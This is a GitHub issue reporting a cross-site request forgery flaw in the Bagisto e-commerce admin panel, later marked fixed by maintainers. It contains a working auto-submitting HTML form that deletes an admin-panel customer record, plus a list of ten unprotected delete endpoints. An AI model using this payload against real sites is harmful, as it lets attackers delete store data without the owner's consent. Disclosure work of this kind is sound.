Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross site request forgery #750

Closed
VikramRajVashisth opened this issue Mar 27, 2019 · 1 comment

Comments

@VikramRajVashisth
Copy link

commented Mar 27, 2019

Vulnerable link: https://demo.bagisto.com/bagisto-103-206-131-18/admin/

What is CSRF ?
A CSRF attack forces a logged-on victims browser to send a forged HTTP request, including the victims session cookie and any other automatically included authentication information, to a vulnerable web application.
Vulnerable Page: Admin Panel menu
cs1

Task: To remove items from table without account owner consent.
How to detect the vulnerability?
It is fairly easy to detect csrf vulnerability via automated tools or code analysis. Here, we will directly look at the href urls of the Delete button which submits value without csrf token using inspect element in the browser.

How to reproduce the attack?
Step1: Admin (victim) signs into Bagisto admin panel and does not sign off or doesn't close browser.
Step2: Admin (victim) opens tab (attacker-controlled website with auto load request containing information the attacker wants to delete), details of request sent to bagisto server, auto loads evil script to delete items from the list.
Step3: Browser executes evil script on attackers behalf and updates the list.

Malicious page containing evil script to edit list:
1.1) Delete users on admin panel: No csrf token used on customer delete button.
The attacker needs to send a link to page containing below code which will be executed when opened in victims browser.


<html>
<body>
<body onload="document.forms[0].submit()">
<form type="hidden" method="get" action="https://demo.bagisto.com/bagisto-103-206-131-18/admin/customers/delete/10">
<!-- Field -->
<input  href="#" value="Save Changes" type="submit">
</form>
</body>
</html>

1.2) Deleting review on admin panel:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/reviews/delete/4
1.3) deleting group:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/groups/delete/1
1.4) Locales:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/locales/delete/2
1.5) Currencies:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/currencies/delete/2
1.6) Exchange rates:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/exchange_rates/delete/2
1.7) Inventory sources:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/inventory_sources/delete/1
1.8) channels:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/channels/delete/1
1.9) Users:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/users/delete/1
1.10) Sliders:
https://demo.bagisto.com/bagisto-103-206-131-18/admin/slider/delete/1

Impacts of vulnerability:
Using this flaw an attacker can remove important functionality of the application which results into denial of most of the services on the store.

Prevention Cheat sheet for developers:
https://www.incapsula.com/web-application-security/csrf-cross-site-request-forgery.html
https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

@rahulshukla-webkul rahulshukla-webkul added this to High priority in Issues Dashboard Mar 28, 2019
prashant-webkul added a commit to prashant-webkul/bagisto that referenced this issue Apr 9, 2019
@prashant-webkul prashant-webkul moved this from High priority to Fixed but waiting for release in Issues Dashboard Apr 9, 2019
@jyoti-webkul

This comment has been minimized.

Copy link
Collaborator

commented Apr 12, 2019

Framework Version: 0.1.5
Fixed

Issues Dashboard automation moved this from Fixed but waiting for release to Closed Apr 12, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
Issues Dashboard
  
Closed
4 participants
You can’t perform that action at this time.